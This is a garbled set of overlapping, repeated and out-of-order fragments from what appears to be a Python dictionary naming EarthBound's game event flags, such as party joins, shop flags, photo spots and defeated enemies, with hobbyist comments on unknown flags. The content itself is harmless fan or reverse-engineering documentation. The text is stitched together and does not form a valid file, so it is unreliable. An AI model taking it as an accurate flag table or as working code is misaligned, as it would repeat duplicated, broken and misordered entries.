'TONY_JOINS',", "'USED_HAWK_EYE', 289: 'ONETT_COP_1_DEFEATED', 290: 'ONETT_COP_2_DEFEATED', 291: 'ONETT_COP_3_DEFEATED', 292: 'ONETT_COP_4_DEFEATED', 293: 'ONETT_COP_5_DEFEATED', 294: 'APPLE_MOUSE_BLOCKING_DOOR',", "'TALKED_TO_BRICK_ROADS_HEAD', 446: 'FOR_SALE_SIGN_CUSTOMER_1', # 447 (???) # 448 (???) 449: 'CAPTAIN_STRONG_AT_STATION_ENTRANCE', 450: 'CAPTAIN_STRONG_NOT_AT_STATION_DESK',", "228 (I hate multipurpose flags) # 229 (I hate multipurpose flags) # 230", "'MONKEY_CAVE_PROTEIN_DRINK', 456: 'MONKEY_CAVE_PIZZA_2', 457: 'MONKEY_CAVE_HAMBURGER_1', 458: 'MONKEY_CAVE_HAMBURGER_2', 459: 'MONKEY_CAVE_KING_BANANA', 460: 'MONKEY_CAVE_HAMBURGER_3', 461: 'MONKEY_CAVE_FRESH_EGG',", "445: 'TALKED_TO_BRICK_ROADS_HEAD', 446: 'FOR_SALE_SIGN_CUSTOMER_1', # 447 (???) # 448 (???) 
449: 'CAPTAIN_STRONG_AT_STATION_ENTRANCE', 450:", "399: 'GUARDIAN_HIEROGLYPH_10_DEFEATED', 400: 'GUARDIAN_HIEROGLYPH_11_DEFEATED', 401: 'GUARDIAN_HIEROGLYPH_12_DEFEATED', 402: 'GUARDIAN_HIEROGLYPH_13_DEFEATED', 403: 'GUARDIAN_HIEROGLYPH_14_DEFEATED', 404: 'GUARDIAN_HIEROGLYPH_15_DEFEATED', 405:", "when Paula joins) 199: 'GOT_DAD_PHONE', 200: 'GOT_MOM_PHONE', 201: 'GOT_ESCARGO_EXPRESS_PHONE', 202: 'GOT_MACH_PIZZA_PHONE', 203: 'GOT_STOIC_CLUB_PHONE',", "201: 'GOT_ESCARGO_EXPRESS_PHONE', 202: 'GOT_MACH_PIZZA_PHONE', 203: 'GOT_STOIC_CLUB_PHONE', 204: 'FLYING_MAN_1_DEAD', 205: 'FLYING_MAN_2_DEAD', 206: 'FLYING_MAN_3_DEAD', 207:", "'SHOP_SATURN_EQUIPMENT', 249: 'SHOP_SATURN_PENDANTS', 250: 'SHOP_SATURN_CONSUMABLES', 251: 'SHOP_DESERT_DRUGSTORE_EQUIPMENT', 252: 'SHOP_DESERT_DRUGSTORE_CONSUMABLES', 253: 'SHOP_DESERT_MINE', 254: 'SHOP_DESERT_ARMS_DEALER',", "693: 'ESCARGO_EXPRESS_HAS_POOS_HAWK_EYE', 694: 'ESCARGO_EXPRESS_PENCIL_ERASER_DELIVERY', 695: 'ESCARGO_EXPRESS_HAWK_EYE_DELIVERY', 696: 'RANDOM_JEFF_ITEM_FIX_CHANCE', 697: 'SHARK_AT_ARCADE_UPSTAIRS_DEFEATED', 698: 'GOT_PHOTO_NESS_HOUSE', 699:", "442: 'GOT_MAGIC_TRUFFLE_4', 443: 'GOT_MAGIC_TRUFFLE_5', 444: 'KING_JOINS', 445: 'TALKED_TO_BRICK_ROADS_HEAD', 446: 'FOR_SALE_SIGN_CUSTOMER_1', # 447 (???)", "'BUBBLE_MONKEY_IN_PARTY', 23: 'TONY_JOINS', 24: 'DUNGEON_MAN_JOINS', 25: 'FLYING_MAN_1_JOINS', 26: 'FLYING_MAN_2_JOINS', 27: 'FLYING_MAN_3_JOINS', 28: 'FLYING_MAN_4_JOINS',", "295: 'NESS_HOUSE_DOOR_KNOCKING', 296: 'ZOMBIE_CHICK_AT_HOTEL_1', # First hotel room 297: 'ZOMBIE_CHICK_AT_HOTEL_2', # Second hotel", "doesn't reference this flag and never fights you 391: 'GUARDIAN_HIEROGLYPH_2_DEFEATED', # The second", "Boogey Tent) 374: 'TOPOLLA_THEATER_BACKSTAGE_UNBLOCKED', 375: 'PEOPLE_IN_ONETT', # 376 (Unknown. Set after Apple Kid", "flags for NPCs #457 and #459 774: 'TALKED_TO_MOONSIDE_SAILOR_MAN', # 775 (Can't get calls", "613: 'TELEPORT_MONKEY_NOT_AT_CAVE', 614: 'TELEPORT_MONKEY_NEAR_MONKEY_CAVE_ENTRANCE', 615: 'TELEPORT_MONKEY_NEAR_DESERT_ROAD', 616: 'TENDAKRAUT_STOLEN', 617: 'MAGIC_CAKE_LADY_AT_BEACH', 618: 'GOT_ERASER_ERASER', #", "'ZOMBIE_CHICK_AT_HOTEL_3', # Third hotel room 299: 'IRON_ERASER_ERASED', 300: 'ZOMBIE_GUARDS_AWAY', 301: 'POKEY_WAITING_AT_DOOR', # 302", "516: 'MONKEY_CAVE_PENCIL_ERASED', 517: 'NESS_ROOM_LIGHTS_ON', 518: 'GUARDIAN_MOLE_TEXT_1', 519: 'GUARDIAN_MOLE_TEXT_2', 520: 'GUARDIAN_MOLE_TEXT_3', 521: 'GUARDIAN_MOLE_TEXT_4', #", "doesn't reference this flag and never fights you 392: 'GUARDIAN_HIEROGLYPH_3_DEFEATED', 393: 'GUARDIAN_HIEROGLYPH_4_DEFEATED', 394:", "350: 'USED_ELEVATOR', 351: 'HH_HQ_CULTIST_1_DEFEATED', 352: 'HH_HQ_CULTIST_2_DEFEATED', 353: 'HH_HQ_CULTIST_3_DEFEATED', 354: 'HH_HQ_CULTIST_4_DEFEATED', 355: 'HH_HQ_CULTIST_5_DEFEATED', 356:", "Yogurt Machine) # 377 (???) # 378 (???) 379: 'ANDONUTS_AT_LAB_ABSENT', # 380 (???)", "# 371 (???) 372: 'PARTY_IS_ROBOTIFIED', # 373 (Unknown. 
Related to Boogey Tent) 374:", "331: 'ANDONUTS_AT_CAVE_OF_THE_PRESENT_2', 332: 'PHASE_DISTORTER_V2_AT_CAVE_OF_THE_PRESENT', 333: 'DESERT_MINE_BULLDOZER_MOVED', 334: 'BUBBLE_MONKEY_JOINS', 335: 'TONY_AT_BOARDING_SCHOOL_GATE', 336: 'GOT_KEY_TO_DUNGEON_MAN', 337:", "not talking to Everdred) 612: 'EVERDRED_NOT_AT_ROOF', 613: 'TELEPORT_MONKEY_NOT_AT_CAVE', 614: 'TELEPORT_MONKEY_NEAR_MONKEY_CAVE_ENTRANCE', 615: 'TELEPORT_MONKEY_NEAR_DESERT_ROAD', 616:", "'GOT_PHOTO_CYCLE_SHOP', 701: 'GOT_PHOTO_PEACEFUL_REST_VALLEY', 702: 'GOT_PHOTO_HAPPY_HAPPY_CABIN', 703: 'GOT_PHOTO_CHAOS_THEATER', 704: 'GOT_PHOTO_LAKE_TESS', 705: 'GOT_PHOTO_BRICK_ROAD_DUNGEON', 706: 'GOT_PHOTO_THREED_CEMETERY',", "'TEMP_5', 6: 'TEMP_6', 7: 'TEMP_7', 8: 'TEMP_8', 9: 'TEMP_9', 10: 'TEMP_10', 11: 'ENEMY_SUPPRESS',", "508: 'PHOTO_DEEP_DARKNESS_AVAILABLE', 509: 'PHOTO_TENDA_VILLAGE_AVAILABLE', 510: 'PHOTO_SATURN_VALLEY_FINAL_AVAILABLE', 511: 'GOT_TOWN_MAP', 512: 'HAS_EXIT_MOUSE', 513: 'ONETT_POST_METEORITE_MUSIC', 514:", "'ESCARGO_EXPRESS_HAS_POOS_HAWK_EYE', 694: 'ESCARGO_EXPRESS_PENCIL_ERASER_DELIVERY', 695: 'ESCARGO_EXPRESS_HAWK_EYE_DELIVERY', 696: 'RANDOM_JEFF_ITEM_FIX_CHANCE', 697: 'SHARK_AT_ARCADE_UPSTAIRS_DEFEATED', 698: 'GOT_PHOTO_NESS_HOUSE', 699: 'GOT_PHOTO_SCAM_HOUSE',", "# 226 (I hate multipurpose flags) # 227 (I hate multipurpose flags) #", "(Something about talking to Paula's dad and not talking to Everdred) 612: 'EVERDRED_NOT_AT_ROOF',", "584: 'HIDE_SUMMERS_SHOP_TOWN_MAP', 585: 'HIDE_SUMMERS_HOSPITAL_TOWN_MAP', 586: 'HIDE_TOTO_SHOP_TOWN_MAP', 587: 'FLYING_MAN_MUSIC', # 588 (Visibility flag for", "452: 'MONKEY_CAVE_PICNIC_LUNCH', 453: 'MONKEY_CAVE_WET_TOWEL', 454: 'MONKEY_CAVE_PIZZA_1', 455: 'MONKEY_CAVE_PROTEIN_DRINK', 456: 'MONKEY_CAVE_PIZZA_2', 457: 'MONKEY_CAVE_HAMBURGER_1', 458:", "367: 'SLIMY_LITTLE_PILE_2_DEFEATED', 368: 'SLIMY_LITTLE_PILE_3_DEFEATED', 369: 'CAN_ENTER_BELCHS_FACTORY', # 370 (Unknown. Related to traffic jam?)", "# 523 (Multipurpose?) 524: 'YOUR_SANCTUARY_MUSIC', # 525 (???) 526: 'NEAR_BLUE_GEYSER_1', 527: 'NEAR_RED_GEYSER', 528:", "736: 'GOT_PAIR_OF_DIRTY_SOCKS', 737: 'TALKED_TO_TWOSON_HOTEL_GUY_AT_TABLE_NINE_TIMES', 738: 'GOT_MONEY_FROM_TWOSON_HOTEL_GUY_AT_TABLE', 739: 'PAULAS_DAD_RAN_IN_FRONT_OF_TWOSON_HOTEL', 740: 'PEOPLE_IN_THREED_ABSENT', 741: 'MONOTOLI_AT_48TH_FLOOR', 742:", "'MONKEYS_AT_WINTERS_LAB', 622: 'BUBBLE_MONKEYS_WIFE_AT_WINTERS', 623: 'PUNK_GUY_OUTSIDE_HIS_HOUSE_THREED', 624: 'EVERDRED_AT_HIS_HOUSE', # 625 (Something about \"Fancy Pokey\"", "(???) # 448 (???) 
449: 'CAPTAIN_STRONG_AT_STATION_ENTRANCE', 450: 'CAPTAIN_STRONG_NOT_AT_STATION_DESK', 451: 'MONKEY_CAVE_SKIP_SANDWICH', 452: 'MONKEY_CAVE_PICNIC_LUNCH', 453:", "hate multipurpose flags) # 233 (I hate multipurpose flags) 234: 'SHOP_TWOSON_DEPT_3RD_FLOOR_WOMAN', 235: 'SHOP_BURGLIN_PARK_JAMAICAN',", "TODO: CONFIRM 592: 'MONKEY_OUTSIDE_JACKIES_CAFE', # TODO: CONFIRM 593: 'POO_TELEPORTING_TO_SUMMERS', 594: 'BLOND_GUY_IN_FOURSIDE', # TODO:", "'KING_WONT_JOIN', 101: 'LEARNED_THAT_LIER_SOLD_THE_MANI_MANI', 102: 'TALKED_TO_SHYGUY_ABOUT_SHYNESS_BOOK', 103: 'LIBRARY_BATHROOM_MAN', # Referenced in unused text 104:", "748: 'SKY_RUNNER_AT_WINTERS_LAB', 749: 'NESS_WEARING_PAJAMAS', 750: 'LEFT_HOME_AT_LEAST_ONCE', 751: 'CHAOS_THEATER_AUDIENCE_ABSENT', 752: 'HINT_GUY_ABSENT', 753: 'NESS_HOUSE_PHONE_RINGING', 754:", "'SHOP_LAB_CAVE_BOY', 247: 'SHOP_GRAPEFRUIT_FALLS', 248: 'SHOP_SATURN_EQUIPMENT', 249: 'SHOP_SATURN_PENDANTS', 250: 'SHOP_SATURN_CONSUMABLES', 251: 'SHOP_DESERT_DRUGSTORE_EQUIPMENT', 252: 'SHOP_DESERT_DRUGSTORE_CONSUMABLES',", "# 448 (???) 449: 'CAPTAIN_STRONG_AT_STATION_ENTRANCE', 450: 'CAPTAIN_STRONG_NOT_AT_STATION_DESK', 451: 'MONKEY_CAVE_SKIP_SANDWICH', 452: 'MONKEY_CAVE_PICNIC_LUNCH', 453: 'MONKEY_CAVE_WET_TOWEL',", "506: 'PHOTO_PYRAMID_AVAILABLE', 507: 'PHOTO_SCARABA_OASIS_AVAILABLE', 508: 'PHOTO_DEEP_DARKNESS_AVAILABLE', 509: 'PHOTO_TENDA_VILLAGE_AVAILABLE', 510: 'PHOTO_SATURN_VALLEY_FINAL_AVAILABLE', 511: 'GOT_TOWN_MAP', 512:", "'RUNAWAY_FIVE_FREE_FROM_CHAOS_THEATER', 120: 'SHOPPED_AT_FOOD_STAND', 121: 'DID_NOT_PAY_FOOD_STAND', 122: 'CARPAINTER_HAS_KEY', 123: 'BLUE_COW_ALT_TEXT', 124: 'ZOMBIE_PAPER_ON_TENT', 125: 'ZOMBIES_ON_TENT_FLOOR',", "528: 'NEAR_BLUE_GEYSER_2', # 529 (???) 530: 'TRACY_NOT_AT_HER_ROOM', 531: 'TRACY_DOWNSTAIRS', 532: 'NESS_ROOM_METEORITE_FALLING_MUSIC', 533: 'NESS_ROOM_METEORITE_CRASH_MUSIC',", "691: 'POO_LEFT_WITH_HAWK_EYE', 692: 'ESCARGO_EXPRESS_HAS_PAULAS_PENCIL_ERASER', 693: 'ESCARGO_EXPRESS_HAS_POOS_HAWK_EYE', 694: 'ESCARGO_EXPRESS_PENCIL_ERASER_DELIVERY', 695: 'ESCARGO_EXPRESS_HAWK_EYE_DELIVERY', 696: 'RANDOM_JEFF_ITEM_FIX_CHANCE', 697:", "610: 'DETECTIVE_IN_THREED', # 611 (Something about talking to Paula's dad and not talking", "128: 'JEFF_STARTS_HIS_JOURNEY', 129: 'TESSIE_EMERGES', 130: 'TALKED_TO_ANDONUTS_2', 131: 'WATERFALL_WAIT_ENABLED', 132: 'QUEST_TO_ZEXONYTE', 133: 'PHASE_DISTORTER_V2_OPEN', 134:", "628: 'PRESENTS_AT_SATURN_VALLEY', 629: 'PARTY_IS_DIRTY_FROM_BELCH_FIGHT', 630: 'BUBBLE_MONKEY_AT_LAKE_TESS', 631: 'TALKED_TO_MOONSIDE_MONOTOLI', 632: 'MONSTERS_IN_ONETT', 633: 'LIERS_HOUSE_UNLOCKED', 634:", "'TENDA_SHOP_HALL_OF_FAME_BAT', # 431 (???) 432: 'DEBUG_SKIP_SANDWICH_DX', 433: 'ZOMBIE_CHICK_HOTEL_MUSIC', 434: 'STARMAN_DX_ABSENT', # (Another flag", "'PICKY_KNOCKING_ON_DOOR', 764: 'READY_TO_LEARN_TELEPORT', 765: 'LEARNED_PHASE_DISTORTER_V2_FUNCTIONS', 766: 'EXIT_MOUSE_DISAGREEABLE', 767: 'LEARNED_ABOUT_UNDERWORLD_GEYSERS', 768: 'PAID_MUSEUM_ENTRANCE_FEE', # 769", "# 156 (???) # 157 (???) # 158 (???) 159: 'CHECKED_LAST_FLYING_MAN_TOMBSTONE', # 160", "157 (???) # 158 (???) 159: 'CHECKED_LAST_FLYING_MAN_TOMBSTONE', # 160 (???) 
# 161 (???)", "'GOT_MONKEYS_LOVE', 651: 'UNDERWORLD_TENDA_GATE_OPEN', 652: 'USED_CARROT_KEY', 653: 'SHOP_DEEP_DARKNESS_ARMS_DEALER', 654: 'DEEP_DARKNESS_BUSINESSMAN_PAID_DOCTORS_FEE', 655: 'SKY_RUNNER_MUSIC', 656: 'ALT_BUY_SOUND_EFFECT',", "Paula's dad and not talking to Everdred) 612: 'EVERDRED_NOT_AT_ROOF', 613: 'TELEPORT_MONKEY_NOT_AT_CAVE', 614: 'TELEPORT_MONKEY_NEAR_MONKEY_CAVE_ENTRANCE',", "'MOONSIDE_COUNTDOWN_GUY_3', 169: 'PHASE_DISTORTER_V2_BEING_FINISHED', # 170 (???) 171: 'GOT_SATURN_LIFENOODLES', 172: 'GOT_SATURN_COIN', 173: 'GOT_SATURN_STAG_BEETLE', 174:", "# Visibility flag for NPCs #851 and #852 760: 'PHASE_DISTORTER_MUSIC', # 761 (Unknown.", "for NPCs #457 and #459 774: 'TALKED_TO_MOONSIDE_SAILOR_MAN', # 775 (Can't get calls from", "calls from Dad?) 776: 'PAULA_AT_MONOTOLI_BUILDING', 777: 'GOT_SYNESS_BOOK_BACK_FROM_TENDA', 778: 'EXIT_MOUSE_ASLEEP', # 779 (Related to", "'COP_AT_ENTERTAINERS_SHACK', 37: 'ALOYSIUS_AT_HOME', 38: 'FIVE_COPS_AT_POLICE_STATION', 39: 'COP_AT_STATION_ENTRANCE', 40: 'SHARK_GUARDING_FRANK_DEFEATED', 41: 'CHAOS_THEATER_STAGE_UNBLOCKED', 42: 'APPLE_KID_IN_BURGLIN_PARK',", "'VISITED_DALAAM', 217: 'VISITED_SCARABA', 218: 'VISITED_DEEP_DARKNESS', 219: 'VISITED_TENDA_VILLAGE', 220: 'VISITED_UNDERWORLD', 221: 'UNUSED_BRAIN_FOOD_LUNCH', 222: 'UNUSED_REFRESHING_HERB',", "# 345 (Related to Lake Tess. This is only set if you're near", "33: 'LIER_INSIDE_CAVE_2', 34: 'PICKY_AT_HIS_ROOM', 35: 'POKEY_AT_HIS_ROOM', 36: 'COP_AT_ENTERTAINERS_SHACK', 37: 'ALOYSIUS_AT_HOME', 38: 'FIVE_COPS_AT_POLICE_STATION', 39:", "every version uses the same flag IDs FLAG_NAMES = { 1: 'TEMP_1', 2:", "'VISITED_DEEP_DARKNESS', 219: 'VISITED_TENDA_VILLAGE', 220: 'VISITED_UNDERWORLD', 221: 'UNUSED_BRAIN_FOOD_LUNCH', 222: 'UNUSED_REFRESHING_HERB', 223: 'GOT_PHASE_DISTORTER_HORN_OF_LIFE', 224: 'SHOP_SOLD_OLD_EQUIPMENT',", "(???) 432: 'DEBUG_SKIP_SANDWICH_DX', 433: 'ZOMBIE_CHICK_HOTEL_MUSIC', 434: 'STARMAN_DX_ABSENT', # (Another flag for Starman DX", "484: 'PHOTO_CHAOS_THEATER_AVAILABLE', 485: 'PHOTO_LAKE_TESS_AVAILABLE', 486: 'PHOTO_BRICK_ROAD_DUNGEON_AVAILABLE', 487: 'PHOTO_THREED_CEMETERY_AVAILABLE', 488: 'PHOTO_GRAPEFRUIT_FALLS_AVAILABLE', 489: 'PHOTO_SATURN_VALLEY_COFFEE_AVAILABLE', 490:", "set, Maxwell doesn't actually save your game. WHAT?) 805: 'PRESENT_CRACKED_BAT', 829: 'PRESENT_TONY_COOKIE_1', 830:", "'HAS_EXIT_MOUSE', 513: 'ONETT_POST_METEORITE_MUSIC', 514: 'JUST_RESTED_AT_HOME', 515: 'FRANK_DEFEATED', 516: 'MONKEY_CAVE_PENCIL_ERASED', 517: 'NESS_ROOM_LIGHTS_ON', 518: 'GUARDIAN_MOLE_TEXT_1',", "'SHOP_SUMMERS_GELATO', 269: 'SHOP_MAGIC_CAKE_LADY', 270: 'SHOP_DALAAM_RESTAURANT', 271: 'SHOP_SCARABA_HASSANS_SHOP', 272: 'DIAMOND_TO_BE_DELIVERED', 273: 'MU_TRAINING_COMPLETE', 274: 'DUNGEON_MAN_AT_PALM_TREES',", "284: 'PEACEFUL_REST_PENCIL_ERASED', 285: 'TALKED_TO_APPLE_KID_CAVE_OF_THE_PRESENT', # 286 (???) # 287 (Something about Lake Tess", "'NEAR_WINTERS_ROPE', 339: 'APPLE_KID_NOT_AT_HIS_HOUSE', # 340 (???) 341: 'RECEIVED_APPLE_KID_CALL_ABOUT_PENCIL_ERASER', 342: 'PYRAMID_OPEN', 343: 'GOT_HIEROGLYPH_COPY', 344:", "about \"Fancy Pokey\" in the Monotoli Building) -- Got kicked out of Pokey's", "'ONETT_COP_2_DEFEATED', 291: 'ONETT_COP_3_DEFEATED', 292: 'ONETT_COP_4_DEFEATED', 293: 'ONETT_COP_5_DEFEATED', 294: 'APPLE_MOUSE_BLOCKING_DOOR', 295: 'NESS_HOUSE_DOOR_KNOCKING', 296: 'ZOMBIE_CHICK_AT_HOTEL_1',", "'CHECKED_LAST_FLYING_MAN_TOMBSTONE', # 160 (???) # 161 (???) # 162 (???) # 163 (???)", "619 (Unkonwn. 
Related to Stonehenge Base) 620: 'APPLE_MOUSE_AT_WINTERS_LAB', 621: 'MONKEYS_AT_WINTERS_LAB', 622: 'BUBBLE_MONKEYS_WIFE_AT_WINTERS', 623:", "'MOONSIDE_SWITCH_YES_NO', 660: 'ALT_NO_TALK_TEXT', 661: 'CHOSEN_FOUR_SOULS_RETURNING_MUSIC', 662: 'DUNGEON_MAN_DESERT_MUSIC', 663: 'RETURNED_SHYNESS_BOOK', 664: 'TREMBLING_MONOTOLI_AT_48TH_FLOOR_ABSENT', 665: 'GOT_LETTER_FROM_MOM',", "'PHOTO_GRAPEFRUIT_FALLS_AVAILABLE', 489: 'PHOTO_SATURN_VALLEY_COFFEE_AVAILABLE', 490: 'PHOTO_CIRCUS_TENT_AVAILABLE', 491: 'PHOTO_BLACK_SESAME_SEED_AVAILABLE', 492: 'PHOTO_DESERT_MINE_AVAILABLE', 493: 'PHOTO_FOURSIDE_BRIDGE_AVAILABLE', 494: 'PHOTO_FOURSIDE_MUSEUM_OUTSIDE_AVAILABLE',", "after defeating Giygas, but never set) 770: 'LAST_ESCARGO_EXPRESS_CALL', # 771 (???) 772: 'LAST_DAD_CALL',", "321 (Something about Paula's Dad acknowledging the kidnapping) 322: 'PAULAS_DAD_NOTICED_SHES_NOT_HOME', 323: 'GOT_PAK_OF_BUBBLE_GUM', 324:", "412: 'LETHAL_ASP_HIEROGLYPH_6_DEFEATED', 413: 'LETHAL_ASP_HIEROGLYPH_7_DEFEATED', 414: 'LETHAL_ASP_HIEROGLYPH_8_DEFEATED', 415: 'LETHAL_ASP_HIEROGLYPH_9_DEFEATED', 416: 'BRICK_ROAD_DUNGEON_DUCK_1_DEFEATED', 417: 'BRICK_ROAD_DUNGEON_DUCK_2_DEFEATED', 418:", "80: 'GOT_KEY_TO_SHACK', 81: 'HAS_BICYCLE', 82: 'GOT_RECEIVER_PHONE', 83: 'GOT_PENCIL_ERASER', 84: 'GOT_HAND_AID', 85: 'GOT_WAD_OF_BILLS', 86:", "IDs FLAG_NAMES = { 1: 'TEMP_1', 2: 'TEMP_2', 3: 'TEMP_3', 4: 'TEMP_4', 5:", "'BROKEN_SKYRUNNER_THREED', 48: 'FIXED_SKYRUNNER_THREED', 49: 'BOOGEY_TENT_IN_THREED', 50: 'BRICK_ROAD_OUTSIDE_DUNGEON', 51: 'SHYNESS_BOOK_AT_LIBRARY', 52: 'CAPTIVES_AT_STONEHENGE', 53: 'TALKED_TO_BRICK_ROAD',", "326: 'SHOP_SCARABA_HOTEL_ARMS_DEALER', 327: 'PHASE_DISTORTER_V3_AT_CAVE_OF_THE_PRESENT', 328: 'ANDONUTS_AT_CAVE_OF_THE_PRESENT_1', 329: 'APPLE_KID_AT_CAVE_OF_THE_PRESENT', 330: 'MR_SATURN_AT_CAVE_OF_THE_PRESENT', 331: 'ANDONUTS_AT_CAVE_OF_THE_PRESENT_2', 332:", "# 380 (???) # 381 (???) 382: 'KIDNAPPED_MR_SATURN_AT_CAVE_OF_THE_PRESENT', 383: 'JUST_RESTED', 384: 'GOT_ALL_MELODIES', 385:", "'FOURSIDE_DEPT_BLACKOUT', 58: 'FOURSIDE_SEWERS_OPEN', 59: 'ELECTRA_OUTSIDE_BUILDING', 60: 'EVERDRED_OUTSIDE_CAFE', 61: 'MAGIC_CAKE_LADY_IDENTIFIED', 62: 'DUNGEON_MAN_IN_DESERT', 63: 'PATH_TO_MANI_MANI_OPEN',", "567: 'HIDE_TWOSON_BUS_STOP_TOWN_MAP', 568: 'HIDE_TWOSON_HOSPITAL_TOWN_MAP', 569: 'HIDE_TWOSON_TO_THREED_TOWN_MAP', 570: 'HIDE_THREED_DRUGSTORE_TOWN_MAP', 571: 'HIDE_THREED_HOTEL_TOWN_MAP', # 572 (???)", "Related to Stonehenge Base) 620: 'APPLE_MOUSE_AT_WINTERS_LAB', 621: 'MONKEYS_AT_WINTERS_LAB', 622: 'BUBBLE_MONKEYS_WIFE_AT_WINTERS', 623: 'PUNK_GUY_OUTSIDE_HIS_HOUSE_THREED', 624:", "'GOT_MAGIC_TRUFFLE_5', 444: 'KING_JOINS', 445: 'TALKED_TO_BRICK_ROADS_HEAD', 446: 'FOR_SALE_SIGN_CUSTOMER_1', # 447 (???) 
# 448 (???)", "329: 'APPLE_KID_AT_CAVE_OF_THE_PRESENT', 330: 'MR_SATURN_AT_CAVE_OF_THE_PRESENT', 331: 'ANDONUTS_AT_CAVE_OF_THE_PRESENT_2', 332: 'PHASE_DISTORTER_V2_AT_CAVE_OF_THE_PRESENT', 333: 'DESERT_MINE_BULLDOZER_MOVED', 334: 'BUBBLE_MONKEY_JOINS', 335:", "talking to Everdred) 612: 'EVERDRED_NOT_AT_ROOF', 613: 'TELEPORT_MONKEY_NOT_AT_CAVE', 614: 'TELEPORT_MONKEY_NEAR_MONKEY_CAVE_ENTRANCE', 615: 'TELEPORT_MONKEY_NEAR_DESERT_ROAD', 616: 'TENDAKRAUT_STOLEN',", "441: 'GOT_MAGIC_TRUFFLE_3', 442: 'GOT_MAGIC_TRUFFLE_4', 443: 'GOT_MAGIC_TRUFFLE_5', 444: 'KING_JOINS', 445: 'TALKED_TO_BRICK_ROADS_HEAD', 446: 'FOR_SALE_SIGN_CUSTOMER_1', #", "'LIERS_HOUSE_UNLOCKED', 634: 'PAULA_TELEPATHY_DREAM_1', 635: 'PAULA_TELEPATHY_DREAM_2', 636: 'PAULA_TELEPATHY_DREAM_JEFF', 637: 'POO_AT_HIS_PALACE', 638: 'PAULA_AT_HER_ROOM', 639: 'TALKED_TO_MAGICANT_EVERDRED',", "'WATERFALL_WAIT_ENABLED', 132: 'QUEST_TO_ZEXONYTE', 133: 'PHASE_DISTORTER_V2_OPEN', 134: 'DELIVERED_ZEXONYTE', 135: 'TALKED_TO_BLACK_SESAME_SEED', 136: 'TRAFFIC_JAM_CLEARED', 137: 'GAVE_FOOD_TO_MONTAGUE',", "# 522 (Multipurpose?) # 523 (Multipurpose?) 524: 'YOUR_SANCTUARY_MUSIC', # 525 (???) 526: 'NEAR_BLUE_GEYSER_1',", "'LIER_BY_MANI_MANI', 309: 'RUNAWAY_BUS_FROM_TWOSON_TO_THREED', 310: 'POKEY_WAITING_AT_COUCH', 311: 'WINTERS_ROPE_LOWERED', 312: 'GHOSTS_BLOCKING_THREED', # 313 (Unknown. Something", "22: 'BUBBLE_MONKEY_IN_PARTY', 23: 'TONY_JOINS', 24: 'DUNGEON_MAN_JOINS', 25: 'FLYING_MAN_1_JOINS', 26: 'FLYING_MAN_2_JOINS', 27: 'FLYING_MAN_3_JOINS', 28:", "(Checked when you talk to Tracy after defeating Giygas, but never set) 770:", "(???) 379: 'ANDONUTS_AT_LAB_ABSENT', # 380 (???) # 381 (???) 382: 'KIDNAPPED_MR_SATURN_AT_CAVE_OF_THE_PRESENT', 383: 'JUST_RESTED',", "only for palette changes, maybe) 435: 'GUARDIAN_GENERAL_DEFEATED', 436: 'SEA_OF_EDEN_KRAKEN_1_DEFEATED', 437: 'SEA_OF_EDEN_KRAKEN_2_DEFEATED', 438: 'SEA_OF_EDEN_KRAKEN_3_DEFEATED',", "your game. WHAT?) 805: 'PRESENT_CRACKED_BAT', 829: 'PRESENT_TONY_COOKIE_1', 830: 'PRESENT_TONY_COOKIE_2', 831: 'PRESENT_TONY_COOKIE_3', 832: 'PRESENT_TONY_COOKIE_4',", "'HIDE_SUMMERS_RESTAURANT_TOWN_MAP', 584: 'HIDE_SUMMERS_SHOP_TOWN_MAP', 585: 'HIDE_SUMMERS_HOSPITAL_TOWN_MAP', 586: 'HIDE_TOTO_SHOP_TOWN_MAP', 587: 'FLYING_MAN_MUSIC', # 588 (Visibility flag", "# 231 (I hate multipurpose flags) # 232 (I hate multipurpose flags) #", "'GOT_PHOTO_GRAPEFRUIT_FALLS', 708: 'GOT_PHOTO_SATURN_VALLEY_COFFEE', 709: 'GOT_PHOTO_CIRCUS_TENT', 710: 'GOT_PHOTO_BLACK_SESAME_SEED', 711: 'GOT_PHOTO_DESERT_MINE', 712: 'GOT_PHOTO_FOURSIDE_BRIDGE', 713: 'GOT_PHOTO_FOURSIDE_MUSEUM_OUTSIDE',", "'PYRAMID_OPEN', 343: 'GOT_HIEROGLYPH_COPY', 344: 'LAKE_TESS_WIND_BLOWING', # 345 (Related to Lake Tess. 
This is", "626: 'MEN_ABOUT_TO_ENTER_CIRCUS_TENT', 627: 'TRACY_HAS_SOUND_STONE', 628: 'PRESENTS_AT_SATURN_VALLEY', 629: 'PARTY_IS_DIRTY_FROM_BELCH_FIGHT', 630: 'BUBBLE_MONKEY_AT_LAKE_TESS', 631: 'TALKED_TO_MOONSIDE_MONOTOLI', 632:", "'PHOTO_THREED_CEMETERY_AVAILABLE', 488: 'PHOTO_GRAPEFRUIT_FALLS_AVAILABLE', 489: 'PHOTO_SATURN_VALLEY_COFFEE_AVAILABLE', 490: 'PHOTO_CIRCUS_TENT_AVAILABLE', 491: 'PHOTO_BLACK_SESAME_SEED_AVAILABLE', 492: 'PHOTO_DESERT_MINE_AVAILABLE', 493: 'PHOTO_FOURSIDE_BRIDGE_AVAILABLE',", "'SHOP_THREED_ARMS_DEALER', 244: 'SHOP_THREED_BAKERY', 245: 'SHOP_WINTERS_DRUGSTORE', 246: 'SHOP_LAB_CAVE_BOY', 247: 'SHOP_GRAPEFRUIT_FALLS', 248: 'SHOP_SATURN_EQUIPMENT', 249: 'SHOP_SATURN_PENDANTS',", "719: 'GOT_PHOTO_STONEHENGE', 720: 'GOT_PHOTO_SUMMERS_HOTEL', 721: 'GOT_PHOTO_FOURSIDE_RESTAURANT', 722: 'GOT_PHOTO_SUMMERS_BEACH', 723: 'GOT_PHOTO_TOTO', 724: 'GOT_PHOTO_SCARABA_BAZAAR', 725:", "'GAVE_RUBY_TO_HIEROGLYPHS_GUY', 347: 'PYRAMID_HOLE_OPEN', 348: 'GOT_HAWK_EYE', 349: 'JUST_WOKE_UP_FROM_MAGICANT', 350: 'USED_ELEVATOR', 351: 'HH_HQ_CULTIST_1_DEFEATED', 352: 'HH_HQ_CULTIST_2_DEFEATED',", "the Monotoli Building) -- Got kicked out of Pokey's Room in the Monotoli", "for palette changes, maybe) 435: 'GUARDIAN_GENERAL_DEFEATED', 436: 'SEA_OF_EDEN_KRAKEN_1_DEFEATED', 437: 'SEA_OF_EDEN_KRAKEN_2_DEFEATED', 438: 'SEA_OF_EDEN_KRAKEN_3_DEFEATED', 439:", "'HIDE_SUMMERS_HOSPITAL_TOWN_MAP', 586: 